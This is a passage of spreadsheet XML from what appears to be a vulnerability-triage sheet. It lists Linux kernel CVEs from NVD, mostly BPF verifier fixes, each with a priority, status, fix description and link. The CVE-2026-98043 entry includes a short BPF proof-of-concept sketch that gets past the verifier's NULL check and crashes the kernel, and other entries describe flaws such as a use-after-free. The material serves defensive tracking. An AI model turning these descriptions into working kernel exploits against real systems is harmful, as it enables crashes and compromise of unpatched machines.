failed lookup returns NULL, NULL != 1 takes the non-NULL edge and the
program dereferences a pointer that is zero.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98040</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98042</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't resurrect a scalar id dropped by collect_linked_regs()
check_cond_jmp_op() copies the compared registers into
env-&gt;{false,true}_reg{1,2} before collect_linked_regs() runs and copies
those snapshots back into both branch states afterwards.
collect_linked_regs() records at most LINKED_REGS_MAX members of a
linked registers group in the jump history and calls clear_scalar_id()
for every member that does not fit. The compared register is not exempt
from that.
As a consequence, sync_linked_regs() might adjust ranges for more
registers than bpf_bt_sync_linked_regs() can propagate precision to.
Collect the linked registers before the snapshots are taken instead.
This might lead to some unnecessary clear_scalar_id's, but from
previous testing situations with many linked registers are
extremely rare.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98042</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98043</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't infer non-NULL from a pointer with an unbounded offset
reg_not_null() decides that a register holds a non-NULL value by
looking at its type alone. For pointer types that allow arithmetic the
type only guarantees a non-NULL base, in case of an unbound offset
the runtime offset value might still add up to NULL.
Consider the followng program:
  r6 = bpf_map_lookup_elem(map, &amp;0);  /* present */
  if (r6 == 0) return 0;
  r7 = bpf_map_lookup_elem(map, &amp;1);  /* absent, NULL at runtime */
  r8 = r7;
  r8 -= r6;     /* pointer - pointer: unknown scalar, -r6 */
  r8 &lt;&lt;= 1;
  r8 &gt;&gt;= 1;     /* any non-negative offset is accepted by */
                /* check_reg_sane_offset_ptr() */
  r6 += r8;     /* verifier: map value;    runtime: zero  */
  if (r7 != r6) return 0;
  *(u8 *)(r7 + 0);  /* r7 is inferred non-NULL, both are zero */
At runtime both registers are zero, the comparison is true and the
load faults with NULL pointer dereference.
Require the offset to be within +-BPF_MAX_VAR_OFF in reg_not_null().</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98043</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98044</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject legacy packet loads from callbacks
check_ld_abs() models a failed BPF_LD_ABS or BPF_LD_IND in a
subprogram as an implicit return with R0 set to zero. It calls
prepare_func_exit() to explore this synthesized path.
When the load is reached directly from a synchronous callback,
prepare_func_exit() enforces the callback return contract and marks R0
precise. R0 is not derived from a real instruction on this path, so
precision backtracking reaches the callback call with R0 still requested
and triggers the "callback unexpected regs" verifier bug. A privileged
program loader can therefore cause a verifier warning and an -EFAULT
BPF_PROG_LOAD.
These legacy packet-load instructions are deprecated. Reject them from
callbacks rather than complicating their implicit-return model. Check all
active frames before constructing the implicit return so nested static
subprograms cannot hide the callback context.
Global functions are verified independently with a fresh frame zero, so
an active-frame check cannot identify a global function called from a
callback. Also check the complete subprogram call graph during stack-depth
validation and reject a function containing a legacy load when any caller
is a callback. This covers global and static descendants without making
has_ld_abs transitive, preserving its per-function BTF return-type check.
Ordinary uses outside callbacks remain supported.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98044</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98045</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark faultable stack helpers as sleepable
The faultable variants of bpf_get_stack() and bpf_get_task_stack() pass
may_fault=true into the common stack collection code. Resolving user-space
build IDs may then call build_id_parse_file() and block on filesystem
reads.
Neither helper prototype sets might_sleep. Since prototype selection uses
the sleepability of the whole program, the verifier can still allow these
helpers from a non-sleepable region within that program, such as an
explicit RCU or preemption-disabled region. The task-stack helper can also
be called from a non-sleepable timer callback of a sleepable program.
Mark both faultable prototypes as sleepable. The existing helper context
check then rejects these calls while continuing to allow them in genuinely
sleepable contexts.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98045</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98046</t>
        </is>
      </c>
      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark bpf_btf_find_by_name_kind() as sleepable
When bpf_btf_find_by_name_kind() finds a type in module BTF, it
returns a new BTF object fd through __btf_new_fd(). This reaches
anon_inode_getfd(), which can sleep while allocating or expanding the
current task fd table.
The helper prototype does not set might_sleep, so the verifier allows
the helper in non-sleepable contexts such as BPF timer callbacks. The
fd allocation can then sleep in softirq context and install the fd into
the interrupted task.
Mark the helper as sleepable. This preserves calls from the main body
of a sleepable syscall program while rejecting calls from its
non-sleepable regions.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98046</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98047</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check ancestor frames for rbtree callbacks
bpf_rbtree_add() invokes its comparator while the caller holds the root
lock. The native insertion code retains raw parent and link pointers across
the callback, so the verifier prohibits unlocking, consuming tree nodes,
or changing RCU state from that callback.
in_rbtree_lock_required_cb() only checks the innermost verifier frame.
Static subprogram calls are permitted while holding a spin lock, and such a
call pushes a frame without in_callback_fn set. Consequently, all callback
restrictions disappear in the nested frame. The subprogram can unlock the
tree, remove and drop the node being compared, then relock. Native insertion
resumes with the stale parent pointer and links freed memory into the tree.
Walk all active frames for the rbtree callback instead. Benign static
subprograms remain permitted, while callback restrictions follow execution
into nested frames.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98047</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98048</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: don't rewrite bpf_fastcall patterns entered by a jump
mark_fastcall_pattern_for_call() must ensure that matched
"spill; call; fill" instruction series is not interrupted by a jump.
Otherwise the rewrite applied by bpf_remove_fastcall_spills_fills()
is not sound.
Record the instructions targeted by jumps in
insn_aux_data[*].jump_target when the CFG is built and use this flag
to stop growing a pattern at such an instruction. Jumps to the first
spill are fine.
Note that existing insn_aux_data[*].jmp_point field can't be reused,
as it marks subprogram return instructions.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98048</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98049</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: zero extend the result of an arena 32-bit cmpxchg
bpf_convert_ctx_accesses() rewrites an atomic on an arena pointer from
BPF_STX | BPF_ATOMIC to BPF_STX | BPF_PROBE_ATOMIC, and it runs before
bpf_opt_subreg_zext_lo32_rnd_hi32().
That pass emits an explicit zero extension for a 32-bit cmpxchg even
when bpf_jit_needs_zext() is false. This is done because on some
architectures 32-bit cmpxchg requires explicit zero extension for the
dst register. E.g. on x86-64 'lock cmpxchg' does not change the %eax
if comparison is successful, while BPF semantics declare that each
operation on a 32-bit register zero extends it's upper half.
is_cmpxchg_insn() matches BPF_MODE == BPF_ATOMIC only, so an arena
cmpxchg misses said zero extension adjustment. This patch adjusts
is_cmpxchg_insn() to match BPF_PROBE_ATOMIC alongside BPF_ATOMIC.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98049</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98051</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bcmasp: fix tx_spb_ring_full() checking same slot cnt times
The loop initialised next_index from intf-&gt;tx_spb_index on every
iteration, so incr_ring() always produced the same result and only
one slot was ever tested.  Move the initialisation before the loop
so each iteration advances next_index and the function correctly
checks that cnt consecutive descriptor slots are available before
allowing a new transmission.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98051</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98053</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Refactor and fix init_config access
Existing code accesses enties found in -&gt;init_configs array through
indexes that are part of -&gt;config_ids array.  Those two are limited by:
-&gt;num_init_configs and -&gt;num_config_ids respectively.  Using ID larger
or equal to -&gt;num_init_configs leads to out-of-bounds access:
avs_path_module_send_init_configs()
loop:
	(...) &amp;acomp-&gt;tplg-&gt;init_configs[ids[i]]
					^ out-of-bounds candidate
Rather than adding another if-statement, refactor the code.  There is no
need to store the IDs, have a list of pointers to actual config-entries
instead.  As the verification of -&gt;init_config entries does not differ from
verification of other types that are part of the topology.c file, simply
reuse the code.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98053</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98054</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Fix unbalanced module reference count
strace_open() invokes try_module_get() which on success takes
the module reference.  If any follow up operation causes
strace_open() to fail, the refcount shall be put down.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98054</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98055</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Clean up the bus when fetching ML caps fails
snd_hdac_ext_bus_get_ml_capabilities() may fail and its return code
shall be checked and accounted for. Address the issue by updating the
error-path for avs_pci_probe().
At the same time, if the function in question succeeds but the next part
of avs_pci_probe() fails, the hlink list shall be cleaned up before
leaving the scope.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98055</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98057</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Add checking nr_subbufs to persistent ring buffer validation
Sashiko reported that the code was using meta-&gt;nr_subbufs without making
sure that it matched the nr_pages + 1 on data that was assuming the two
were the same.
Add a check to the persistent ring buffer validation code to make sure
that the saved nr_subbufs matches what we expect.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98057</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98058</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark syscall helpers as sleepable
bpf_sys_bpf() executes the bpf(2) syscall body, which can take mutexes,
allocate with GFP_KERNEL, and wait for an RCU grace period.
bpf_sys_close() reaches close_fd() and filp_close(), which can sleep as
well.
Both helpers are limited to BPF_PROG_TYPE_SYSCALL, whose main program is
sleepable. That does not make every callback sleepable: a syscall program
can register a bpf_timer callback, and the verifier checks that callback
in a non-sleepable context while retaining the syscall helper set.
Without .might_sleep on the prototypes, such a callback can invoke
bpf_sys_bpf() from hrtimer softirq context and trigger a
scheduling-while-atomic failure. bpf_sys_close() is exposed through the
same missing context check.
Set .might_sleep on both prototypes so the existing helper-context check
rejects them from timer callbacks and other atomic regions. Calls from the
sleepable main body remain valid.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98058</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98059</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark sched_process_wait argument as nullable
do_wait() passes wo-&gt;wo_pid to the sched_process_wait tracepoint.
kernel_wait4() leaves wo_pid NULL for wait4(-1), and
